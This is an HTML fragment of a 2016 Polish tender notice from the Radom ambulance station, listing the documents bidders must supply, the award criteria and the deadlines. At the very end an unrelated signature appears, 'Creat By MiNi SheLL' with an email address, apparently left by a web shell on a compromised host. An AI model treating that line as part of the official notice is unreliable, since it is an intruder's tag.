<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na ofertę składają się następujące dokumenty i załączniki:

a) wypełniony i podpisany  formularz ofertowy z wykorzystaniem wzoru stanowiącego-  
    załącznik nr 1 do SIWZ.
b) Oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z 
     art.22 ust.1 z wykorzystaniem wzoru stanowiącego - załącznik nr 2 do SIWZ
c) Oświadczenie o braku podstaw do wykluczenia z powodu niespełnienia warunków, o 
     których mowa w art.24 ust. 1  z wykorzystaniem wzoru stanowiącego - załącznik nr 3 do 
     SIWZ.
d)  Oświadczenie Wykonawcy: że należy do tej samej grupy kapitałowej, o której mowa w 
      art. 24 ust. 2 pkt 5 ustawy, lub oświadczenie, że Wykonawca nie należy do żadnej grupy 
      kapitałowej z wykorzystaniem wzoru stanowiącego - załącznik nr 4 do SIWZ.
e)  Wypełniony i podpisany  formularz cenowy  z wykorzystaniem wzoru- załącznik nr 5 do    
      SIWZ.
f)   Oświadczenie w trybie art.44 ustawy -  zawarte w treści druku formularza ofertowego,
g)  Akceptacja projektu - umowy  - załącznik nr 6 do SIWZ - zawarta w treści druku 
      formularza ofertowego,
h)  Aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności 
     gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu 
     wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 Ustawy, 
     wystawionego  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
 i)  Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających 
     ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych,
j) Oświadczenie, że oferowany przedmiot zamówienia  jest zgodny z Ustawą o     wyrobach   medycznych z dnia 20 maja 2010 /Dz. U. nr 107, poz. 679 z dnia 17 czerwca 2010/ oraz że jest dopuszczony do obrotu i stosowania w placówkach prowadzących działalność leczniczą lub stosowne oświadczenie iż do danego produktu nie stosuje się przepisów w/w ustawy. Na każde żądanie Zamawiającego wykonawca zobligowany jest do przedłożenia aktualnych kopii dokumentów świadczących o wymaganym dopuszczeniu do obrotu i  stosowania w Polsce.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pogotowie.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomska Stacja Pogotowia Ratunkowego w Radomiu, ul. Tochtermana 1, 26-600 Radom,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2016 godzina 10:00, miejsce: sekretariat - I piętro (pok. nr 12), w siedzibie Radomskiej Stacji Pogotowia Ratunkowego w Radomiu, ul. Tochtermana 1, 26-600 Radom,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com